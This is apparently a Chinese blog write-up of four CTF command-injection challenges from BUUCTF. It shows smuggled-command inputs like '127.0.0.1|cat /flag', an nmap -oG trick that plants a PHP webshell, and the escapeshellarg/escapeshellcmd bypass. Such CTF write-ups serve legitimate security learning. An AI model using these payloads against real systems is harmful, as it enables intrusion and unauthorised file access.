持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第2天,点击查看活动详情
前言:这是命令执行漏洞buu上面的两道例题,在这里分享一下
buu【GXYCTF2019】PINGPINGPING
ls(英文全拼:list files):用于显示指定工作目录下的内容(列出目前工作目录所含之文件及子目录)
cat(英文全拼:concatenate):用于连接文件并打印到标准输出设备上。
6bc6cf09-cb4d-4729-8b56-6cec83da2872.node4.buuoj.cn:81/?ip=127.0.0…
空格被过滤
6bc6cf09-cb4d-4729-8b56-6cec83da2872.node4.buuoj.cn:81/?ip=127.0.0…
符号被过滤,于是试试第三种过滤方法
6bc6cf09-cb4d-4729-8b56-6cec83da2872.node4.buuoj.cn:81/?ip=127.0.0…
结果又发现flag又被过滤了,离谱。
6bc6cf09-cb4d-4729-8b56-6cec83da2872.node4.buuoj.cn:81/?ip=127.0.0…
只有个这玩意,查看源码,得到flag
[ACTF2020 新生赛]Exec
还是先看一下目录有什么东西
127.0.0.1|ls
发现有个index.php
ls /时返回上一级目录
127.0.0.1|ls /
127.0.0.1|cat /flag
得到flag
[BUUCTF 2018]Online Tool
漏洞点:单独使用escapeshellarg 和escapeshellcmd 中任意一个都不会出现问题,或者先使用escapeshellcmd再使用escapeshellarg 也不会出现问题,唯有题目中先escapeshellarg 在escapeshellcmd 会有漏洞
nmap的知识点:在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件。可以上传一句话木马,再用蚁剑链接,就可以顺利拿到flag了
构造payload:?host=' -oG hack.php '
f15643b7-d9fa-40d8-8379-fc5ddc5875dd.node4.buuoj.cn/98159fe8cfa…
hack=system('ls');
[网鼎杯 2020 朱雀组]Nmap
这个题的环境类似于nmap,输入一个命令行,就会输出ip地址。
例如输入127.0.0.1,
试一下127.0.0.1|ls,出现了这一段话。
提示地址错误 ,直接放入网上搜到的payload:
' -oG hack.php '
这个payload和上一个题online tool的那一个是一样的
应该是做了什么限制,尝试修改文件名后缀为phtml, 加上扫描的地址:127.0.0.1:
127.0.0.1 | ' -oG hack.phtml'
这个就是扫描结果。
\
\
\
\
\
第二种方法:
payload:' -iL /flag -oN flag.txt '
存入flag.txt,访问得到flag